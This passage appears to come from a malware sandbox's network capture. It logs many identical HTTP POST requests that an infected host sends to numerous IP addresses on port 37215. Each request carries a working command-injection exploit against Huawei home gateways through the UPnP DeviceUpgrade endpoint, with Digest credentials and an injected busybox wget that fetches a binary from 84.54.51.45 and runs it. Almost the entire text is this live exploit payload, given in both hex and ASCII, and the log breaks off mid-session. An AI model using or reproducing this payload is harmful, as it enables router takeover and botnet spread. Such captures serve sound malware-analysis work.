2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2371192.168.2.154360041.62.23.16137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.808615923 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2372192.168.2.153529241.115.168.5637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.808645964 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2373192.168.2.153695841.74.14.4137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.808665991 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2374192.168.2.153287841.24.176.637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.808690071 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2375192.168.2.154692241.140.201.23837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.808708906 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2376192.168.2.154978041.236.138.22437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.808739901 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2377192.168.2.153463041.72.235.16537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.808764935 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2378192.168.2.155911241.12.101.21237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.808789968 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2379192.168.2.154561441.65.70.12437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.808815956 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2380192.168.2.153869441.177.123.5137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.808841944 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2381192.168.2.155549241.222.119.1837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.808866024 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
